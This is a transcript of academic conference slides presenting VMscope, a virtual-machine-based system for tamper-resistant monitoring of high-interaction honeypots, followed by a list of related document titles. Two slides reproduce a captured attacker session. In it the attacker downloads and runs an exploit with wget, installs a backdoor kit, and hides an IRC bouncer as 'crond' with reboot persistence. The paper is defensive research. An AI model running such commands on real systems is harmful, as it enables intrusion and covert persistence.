Upload File

“out-of-the-box” monitoring of vm-based high-interaction honeypots xuxian jiang, xinyuan wang...

  • Home
  • Documents
  • “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George
23
“Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George Mason University {xjiang, xwangc}@gmu.edu RAID’07, Queensland, Australia, Sep 4,

Upload: evelyn-thore

Post on 15-Dec-2015

215 views

Category:

Documents


0 download

Report

Tags:

TRANSCRIPT

Page 1: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

“Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots

Xuxian Jiang, Xinyuan Wang

Department of Information and Software EngineeringGeorge Mason University

{xjiang, xwangc}@gmu.edu

RAID’07, Queensland, Australia, Sep 4, 2007

Page 2: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Outline

Motivation VMscope

Enabling “Out-of-the-Box” Honeypot Monitoring

Evaluation Related Work Conclusion

Page 3: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Motivation

Promise of honeypots Providing insights into intruders’

motivations, tactics, and tools Highly concentrated datasets w/ low noise Low false-positive and false negative rate

Discovering unknown vulnerabilities/exploitations Example 1: HoneyMonkey finds first zero-day

exploit [Wang+ NDSS’06] Example 2: CERT advisory CA-2002-01 (solaris

CDE subprocess control daemon – dtspcd)

Page 4: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Motivation

Honeypot monitoring The essential component in any honeypot

deployment Two main approaches (state of the art)

External honeypot monitoring e.g., tcpdump, ethereal, etc

Internal honeypot monitoring e.g., syslog, sebek, etc

Internal

External

Tamper-resistance

Deep Inspection

Low

High

Yes

No

Page 5: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Motivation: A Real-World Example

Sebek – the de-facto high-interaction honeypot monitoring tool, which performs three basic tasks Observe system call activities Record Data Export Data

However, it has been demonstrated that it can be detected, disabled, or completely evaded by NoSEBrEaK [Holz+, IAW’04/ BlackHat’04/Defcon 12]

Page 6: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Focus of This Talk

“Out-of-the-Box” honeypot monitoring VMscope

Internal

External

Deep Inspection

Low

High

Yes

No

Tamper-resistance

Page 7: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Key idea: leveraging and extending virtualization to enable tamper-resistant, deep inspection of VM-based high-interaction honeypots Existing tools only achieve one of them, but not both

ApacheFirefoxIE

Logger

Guest OS

Virtual Machine Monitor (VMM)

Virtual Machine

Log

VMscope

Tamper-resistant Logging: VMscope is deployed completely “out-of-the-

box”

Tamper-resistant Logging: VMscope is deployed completely “out-of-the-

box”

Deep Inspection: VMscope intercepts and interprets all system call

events

Deep Inspection: VMscope intercepts and interprets all system call

events

Page 8: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

ApacheFirefoxIE

Guest OS

Virtual Machine

Design (Sebek vs. VMscope)

Tamper-resistant logging: In VMscope, log is not collected from inside

the VM that is being monitored

Logger

ApacheFirefoxIE

OS Kernel

Machine

SebekSebek

Logger

Virtual Machine Monitor (VMM)

VMscopeVMscope

Logger

Page 9: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Design

Deep Inspection

What we can observe? Low-level events

Privileged instructions, Interrupts, I/O accesses …

What we want to observe? High-level events w/ semantic

info Especially system calls.

Virtual Machine Monitor (VMM)

Guest OSSemantic Gap

Page 10: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Bridging the Semantic Gap

Idea: leveraging the semantics associated with system call instructions e.g., invoking “exit” system call:

xorl %ebx, %ebx /* ebx = 0 */mov $0x1, %eax /* eax = 1 */int $0x80 /* interrupt */

Also works when interpreting the system call return values

Other related issues The current process

e.g., PID, UID, process name, etc Guest memory addressing

Page 11: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Identifying the Current Process

The Linux kernel maintains a process-specific kernel stack (ESP) ESP struct task_struct in Linux 2.4 ESP struct thread_info in Linux 2.6

The Windows kernel similarly maintains a data structure, i.e., KTHREAD, for each kernel thread struct KTHREAD struct EPROCESS

Works for Windows 2000/XP/2003, but with varing definitions, though

Page 12: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Guest Memory Addressing

Inside the VM, the hardware automates the translation process Guest virtual -> guest physical

Outside the VM, we need to emulate the translation process CR3 page directory page table guest

physical

Page 13: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Outline

Motivation VMscope

“Out-of-the-Box” Honeypot Monitoring Evaluation Related Work Conclusion

Page 14: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Implementation

A prototype has been implemented on top of QEMU and VMware 2800+ LOCs (in C) Supporting both Linux VMs and Windows VMs (in

progress)

Demo (3.5mins) http://www.ise.gmu.edu/~xjiang/vmscope/vmscop

e.swf

http://www.ise.gmu.edu/~xjiang/vmscope/vmscope.swf
http://www.ise.gmu.edu/~xjiang/vmscope/vmscope.swf
Page 15: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Evaluation

Deep Inspection Apache normal runs Apache under infections (by Slapper worms) Honeypot incidents

Tamper-resistance A comparative study between Sebek and

VMscope NoSEBrEaK + adore_ng (a kernel rootkit)

Page 16: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Deep Inspection – Apache

In response to a simple web request

Page 17: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Deep Inspection – A Honeypot Incident

Two vulnerabilities Vul 1: Apache (CERT® CA-2002-17) Vul 2: Ptrace (CERT® VU-6288429)

Deployed at 23:00pm, 01/26/2007, compromised 3 hours later

PID 1562 ( sh)[sys_execve 11]: bash -i...PID 1572 ( bash)[sys_execve 11]: uname -aPID 1573 ( bash)[sys_execve 11]: idPID 1574 ( bash)[sys_execve 11]: w...PID 1632 ( bash)[sys_execve 11]: lsPID 1633 ( bash)[sys_execve 11]: wget xxxxxxx.xx.ro/soft/explPID 1634 ( bash)[sys_execve 11]: chmod +x explPID 1635 ( bash)[sys_execve 11]: ./expl...

1. Gaining a regular account: apache

2. Escalating to the root privilege

Page 18: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Deep Inspection – A Honeypot Incident

PID 1674 ( bash)[sys_execve 11]: wget xxxxxxx.xx.ro/soft/naky.tgzPID 1676 ( bash)[sys_execve 11]: tar -zxvf naky.tgzPID 1679 ( bash)[sys_execve 11]: chmod +x *PID 1680 ( bash)[sys_execve 11]: ./install ...

PID 1882 ( bash)[sys_execve 11]: mkdir ". "PID 1883 ( bash)[sys_execve 11]: wget www.xxxxxxxx.org/vulturul/bnc.tgzPID 1886 ( bash)[sys_execve 11]: tar xvfz bnc.tgzPID 1888 ( bash)[sys_execve 11]: rm -rf bnc.tgzPID 1889 ( bash)[sys_execve 11]: mv psybnc crondPID 1892 ( bash)[sys_execve 11]: crondPID 1894 ( bash)[sys_execve 11]: pico /etc/rc.d/rc.local

3. Installing a set of backdoors

4. Installing an IRC bot that will auto-start after machine reboot

Page 19: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Tamper-resistance

Demo Clip (2.5 minutes): http://www.ise.gmu.edu/~xjiang/

vmscope/sebek.swf

Page 20: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Performance Evaluation

Evaluation Environment Dell PowerEdge server 2950 running Fedora

Core 5 w/ a 3.73 GHz Xeon and 4GB RAM Benchmark Applications

0

20

40

60

80

100

Apache 2.2.0-5.12 nbench 2.2.2 gzip 1.33 make 3.80 unixbench 4.1.0

% o

f ful

l spe

ed

BASE VMscope

Page 21: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Related Work

Honeypot monitoring External honeypot monitoring (e.g., tcpdump)

Ineffective when traffic is encrypted Internal honeypot monitoring (e.g., Sebek)

Could be potentially detected, disabled and evaded

Other virtualization-based efforts Xebek / VMM-based sensors

Not completely “out-of-the-box” Based on para-virtualization, which requires modifying the guest

OS kernels Some logging components are still running inside the guest OS

Page 22: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Internal

External

Deep Inspection

Low

High

Yes

No

Tamper-resistance

Conclusions

A new approach to monitoring VM-based high-interaction honeypots – VMscope

Page 23: “Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George

Thank you!


Honeypots final

IDS+Honeypots Making Security Simple

Bsides chicago 2013 honeypots

Modeling Malware-driven Honeypots · PDF fileTRUSTBUS 2017 Honeypots § Honeypots: what are they used for ? – All traffic received in them are considered suspicious. – Replicate

Honeypots monitorizando a_los_atacantes

Honeypots and Honeynets · CYBR371/NWEN438: System and Network Security What are Honeypots •Honeypots are real or emulated vulnerable systems ready to be attacked. •Primary value

NLET Microblogging 19.4.2011 Jingjing Liu Xinyuan Sui Henna Heikkilä

Honeypots, Cybercompetitions, and Bug Bounties

Honeypots Workshop - CERT.br · PDF fileQ-CERT Honeypots Workshop - Doha, Qatar - April 18-19, 2007 Agenda •Background about the presenters •Concepts –Honeypots, Honeynets, etc

Analyzing Internet Attacks With Honeypots

Uso de Honeypots com Honeyd

Honeypots (Ravindra Singh Rathore)

Using Honeypots to Monitor Spam and Attack Trends - · PDF fileUsing Honeypots to Monitor Spam and Attack Trends ... • Only data directed to the honeypot is collected ... Using Honeypots

Honeypots & Honeynets - wiki.apnictraining.net

HONEYPOTS REVEALED€¦ · the blackhat community.4 But there are the needs to remind organizations that implement honeypots of one main thing – honeypots never assist to upgrade

Honeypots Monitoring Attackers

Use Honeypots to KYE

Xinyuan (Susie) Zhang DQMM/ORS/OGD/CDER/FDA November 18, 2016 · Bioequivalence and Characterization of Generic Drugs. Xinyuan (Susie) Zhang . DQMM/ORS/OGD/CDER/FDA . November 18,

Bsides detroit 2013 honeypots

36924807 Honeypots Seminar Report

PenTest Extra 6_2012 Honeypots

Analyzing Internet Attacks with Honeypots - BruCONfiles.brucon.org/2013/analyzing_internet_attacks_with_honeypots.pdf · Workshop outline Honeypots (cont.) Other honeypot-related

Dr. Honeypots - archive.hack.luarchive.hack.lu/2017/Dr.Honeypots-Hack.lu-2017.pdf · - Gen1 : network of honeypots - Gen2 : honeypots in a production environment, for example deployed

Deliverable D3.3 EPES Honeypots

Honeypots and Honeynets

TESTING DECEPTIVE HONEYPOTS - CORE

ABSTRACT Thesis: MULTI-FEATURE ANALYSIS OF EEG Xinyuan …

Qa 00104 Honeypots Presentation

Honeypots for Active Defense

Tracing Cyber Threats · The word Honeysystem is a collective term that is used to describe different varieties of Honeypots, which include client-side Honeypots, server-side Honeypots

Honeypots Seminar Report

Billing Attacks on SIP-Based VoIP Systems€¦ · Billing Attacks on SIP-Based VoIP Systems Ruishan Zhang, Xinyuan Wang, Xiaohui Yang, Xuxian Jiang Department of Information and Software

CmpE-220 Honeypots Final

Deception Techniques Using Honeypots

SODA : a Service-On-Demand Architecture An Utility Computing Perspective Xuxian Jiang